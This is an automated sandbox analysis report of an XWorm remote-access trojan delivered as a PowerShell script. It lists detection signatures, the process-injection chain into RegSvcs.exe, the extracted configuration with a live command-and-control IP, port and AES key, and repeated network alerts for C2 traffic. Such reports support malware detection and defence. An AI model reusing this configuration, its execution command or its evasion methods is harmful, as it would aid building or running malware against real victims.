Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
92.255.57.155.ps1

Overview

General Information

Sample name:92.255.57.155.ps1
Analysis ID:1581903
MD5:f555029ba45bc9f18b451066721785c8
SHA1:930ea2fb160b84b3fd841aebd5a462896eccd400
SHA256:d6e3fbc61a201ac72495e59f7f2f3967e2ecf11f54675618a17b2ab4986e6f8b
Tags:92-255-57-155bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 3716 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 5252 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 3736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1c9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1cf0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1d80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1b38:$cnc4: POST / HTTP/1.1
      Process Memory Space: RegSvcs.exe PID: 5252JoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: RegSvcs.exe PID: 5252MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x2a81a:$s8: Win32_ComputerSystem
        • 0x2a856:$s8: Win32_ComputerSystem
        • 0x498dd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x49999:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x49a23:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x497ab:$cnc4: POST / HTTP/1.1
        SourceRuleDescriptionAuthorStrings
        0.2.powershell.exe.1b599389800.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", ProcessId: 6820, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", ProcessId: 6820, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-29T09:49:16.560934+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:49:29.301964+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:49:30.464963+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:49:44.402294+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:49:58.404895+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:49:59.328119+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:03.029819+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:03.964582+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:04.172071+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:04.292081+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:04.455341+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:04.814163+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:05.692558+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:05.902574+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:06.044909+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:06.869260+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:07.045873+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:07.256110+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:07.379455+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:07.569545+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:08.464730+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:08.675163+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:08.803911+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:08.887654+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:10.074005+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:10.417934+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:10.715280+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:10.868985+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:10.967271+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:11.520798+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:11.611605+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:12.549466+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:12.759741+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:12.874435+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:13.089706+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:13.204806+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:13.342990+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:13.414813+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:13.545363+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:14.605324+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:14.815830+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:14.874751+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:15.026044+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:15.147035+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:16.090356+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:16.527221+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:16.737455+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:16.796176+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:17.067356+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:17.405988+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:17.529253+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:18.574130+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:18.784637+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:18.904468+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:19.263348+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:20.809032+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:21.047340+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:21.496954+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:21.539001+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:21.791442+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:22.413793+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.032242+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.218153+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.362255+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.483258+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.651202+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:23.770698+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:24.337402+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:24.590080+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:24.826185+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:24.920019+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:25.039575+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:25.410895+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:25.454605+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:25.735223+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:26.542763+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:26.795033+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:27.005261+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:27.431716+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:27.729998+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:27.984051+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:28.349203+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:28.647855+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:28.845282+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:28.964601+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:29.055428+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:29.175074+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:29.265968+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:29.385226+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:29.505083+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:30.267599+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:30.933815+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:31.144316+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:31.383523+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:31.503069+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:31.635012+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:32.351876+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:34.011259+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:34.370884+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:34.691200+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:34.820320+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:34.910856+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:36.402691+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:36.636705+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:37.028153+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:37.264888+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:37.358341+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:37.718652+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:38.077885+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:38.855270+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:39.065640+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:39.211108+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:39.318908+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:39.421416+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:39.574975+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:40.560743+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:40.797191+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:40.916824+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:41.419394+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:41.631321+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:42.699143+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:42.909380+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:43.055664+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:43.306431+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:43.639295+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:44.266999+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:44.477066+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:44.920968+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:45.944505+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:46.242158+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:46.859638+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:47.322907+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:47.401350+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:47.533207+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:48.162862+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:48.793146+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:49.003677+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:49.123194+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:49.453859+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:50.636899+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:50.892561+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:51.509171+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:51.983669+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:52.619465+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:52.796384+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:53.125986+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:53.700978+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:54.777634+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:55.030677+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:55.269249+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:55.522807+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:55.605116+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:55.902793+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:56.714702+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:56.925186+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:57.178951+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:57.255964+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:58.683506+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:59.355347+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:59.996072+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:50:59.996115+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:00.433841+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:00.730443+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:01.052735+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:01.222593+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:01.383482+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:01.851191+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:02.142201+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:02.465885+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:02.630456+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:02.905722+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:03.665531+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:03.875638+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:03.996284+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:04.504595+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:04.715168+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:04.796051+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:04.925368+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.125989+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.182844+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.336382+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.572643+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.781289+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:05.905298+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:06.270171+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:06.480651+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:06.693300+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:29.367466+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          2024-12-29T09:51:38.955890+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-29T09:49:16.610128+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:49:30.466737+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:49:44.404637+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:49:58.406885+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:03.047504+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.245200+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.364800+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.484146+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.667286+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.786671+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:04.950315+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
